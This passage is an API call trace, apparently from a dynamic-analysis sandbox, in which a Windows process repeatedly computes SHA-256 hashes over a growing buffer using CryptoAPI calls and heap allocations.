	[0118.513] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fb9b0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb9b0, pdwDataLen=0x129364) returned 1
	[0118.513] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.513] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.513] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.514] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.514] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0118.514] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fb9d8
	[0118.514] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fb9d8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fb9d8, pdwDataLen=0x129364) returned 1
	[0118.514] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.514] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.514] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.514] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.514] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0118.514] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fba00
	[0118.514] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fba00, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fba00, pdwDataLen=0x129364) returned 1
	[0118.514] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.514] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.514] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.515] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.515] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0118.515] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fba28
	[0118.515] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fba28, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fba28, pdwDataLen=0x129364) returned 1
	[0118.515] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.515] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.515] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.515] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.515] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0118.515] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fba50
	[0118.515] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fba50, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fba50, pdwDataLen=0x129364) returned 1
	[0118.515] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.515] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.515] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.516] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.516] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0118.516] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fba78
	[0118.516] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fba78, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fba78, pdwDataLen=0x129364) returned 1
	[0118.516] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.516] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.516] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.516] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.516] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0118.516] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbaa0
	[0118.516] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbaa0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbaa0, pdwDataLen=0x129364) returned 1
	[0118.516] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.516] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.516] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.517] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.517] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0118.517] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbac8
	[0118.517] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbac8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbac8, pdwDataLen=0x129364) returned 1
	[0118.517] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.517] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.517] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.517] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.517] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0118.517] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbaf0
	[0118.517] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbaf0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbaf0, pdwDataLen=0x129364) returned 1
	[0118.517] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.517] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.517] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.518] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.518] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0118.518] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbb18
	[0118.518] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbb18, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbb18, pdwDataLen=0x129364) returned 1
	[0118.518] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.518] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.518] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.518] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.518] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0118.518] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbb40
	[0118.518] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbb40, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbb40, pdwDataLen=0x129364) returned 1
	[0118.518] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.518] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.518] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.519] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.519] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0118.519] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbb68
	[0118.519] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbb68, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbb68, pdwDataLen=0x129364) returned 1
	[0118.519] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.519] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.519] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.519] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.519] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0118.519] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbb90
	[0118.519] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbb90, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbb90, pdwDataLen=0x129364) returned 1
	[0118.519] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.519] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.519] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.520] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.520] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0118.520] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbbb8
	[0118.520] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbbb8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbbb8, pdwDataLen=0x129364) returned 1
	[0118.520] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.520] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.520] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.520] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.520] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0118.520] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbbe0
	[0118.520] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbbe0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbbe0, pdwDataLen=0x129364) returned 1
	[0118.520] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.520] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.520] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.521] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.521] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0118.521] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbc08
	[0118.521] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbc08, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbc08, pdwDataLen=0x129364) returned 1
	[0118.521] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.521] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.521] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.521] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.521] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0118.521] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbc30
	[0118.521] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbc30, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbc30, pdwDataLen=0x129364) returned 1
	[0118.521] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.521] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.521] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.522] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.522] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0118.522] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbc58
	[0118.522] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbc58, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbc58, pdwDataLen=0x129364) returned 1
	[0118.522] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.522] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.522] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.522] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.522] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0118.522] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbc80
	[0118.522] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbc80, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbc80, pdwDataLen=0x129364) returned 1
	[0118.522] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.522] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.522] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.523] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.523] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0118.523] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbca8
	[0118.523] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbca8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbca8, pdwDataLen=0x129364) returned 1
	[0118.523] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.523] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.523] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.523] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.523] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0118.523] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbcd0
	[0118.523] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbcd0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbcd0, pdwDataLen=0x129364) returned 1
	[0118.523] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.523] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.523] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.523] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.524] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0118.524] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbcf8
	[0118.524] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbcf8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbcf8, pdwDataLen=0x129364) returned 1
	[0118.524] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.524] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.524] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.524] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.524] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0118.524] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbd20
	[0118.524] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbd20, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbd20, pdwDataLen=0x129364) returned 1
	[0118.524] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.524] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.524] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.524] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.525] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0118.525] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbd48
	[0118.525] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbd48, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbd48, pdwDataLen=0x129364) returned 1
	[0118.525] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.525] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.525] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.525] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.525] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0118.525] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbd70
	[0118.525] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fbd70, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbd70, pdwDataLen=0x129364) returned 1
	[0118.525] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.525] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.525] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.525] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.526] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0118.526] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fbd98
	[0118.526] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fbd98, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22fbd98, pdwDataLen=0x129364) returned 1
	[0118.526] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.526] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.526] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.526] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.526] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0118.526] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
